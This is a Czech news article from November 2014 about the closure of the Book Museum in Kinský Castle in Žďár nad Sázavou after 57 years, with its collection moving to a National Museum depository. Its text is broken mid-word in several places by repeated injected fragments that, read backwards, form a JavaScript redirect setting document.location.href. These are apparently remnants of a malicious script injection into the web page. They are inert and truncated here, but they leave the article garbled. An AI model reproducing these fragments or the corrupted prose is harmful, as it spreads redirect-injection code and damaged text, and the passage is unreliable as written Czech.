muzeum knihy
Rainbow page separator

Muzeum knihy po sedmapadesáti letech ukončilo činnost

Pondělí, 3. listopadu 2014

Muzeum knihy Žďár nad Sázavou

Žďár nad Sázavou / Po sedmapadesáti letech poslední říjnový den ve Žďáře ukončilo provoz Muzeum knihy v zámku rodiny Kinských. Během lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu se všechny svazky postupně převezou do depozitáře Národního muzea v Terezíně. Expozice by potřebovala nákladnou modernizaci, nicméně na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to chybějí finance.
Pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory, které unikátní výstava mapující dějiny písemnictví zabírala, poslouží pro jiné účely. Půjde například o pořádání koncertů či svateb.
Muzeum knihy ve Žďáře nad Sázavou vzniklo v roce 1957 z podnětu knihovníka Bohumíra Lifky a ve spolupráci se Státní památkovou správou. Nabízelo průřez vývojem písemnictví od středověkých rukopisů přes staré tisky až po současnou grafiku a knižní ilustraci. Začátkem 90. let minulého s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí byla expozice rozšířena o samizda[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou a exilovou literaturu.
Žďárské Muzeum knihy využívala laická i odborná veřejnost, častými návštěvníky byli školáci. Národní muzeum však bude s rodinou Kinských spolupracovat i nadále. Zapůjčí jí exponáty do nového muzea, jež interaktivní formou návštěvníkům přiblíží kulturní dědictví regionu. To[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to muzeum v současné době vzniká v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách bývalého zámeckého pivovaru, zprovozněno bude v příštím roce.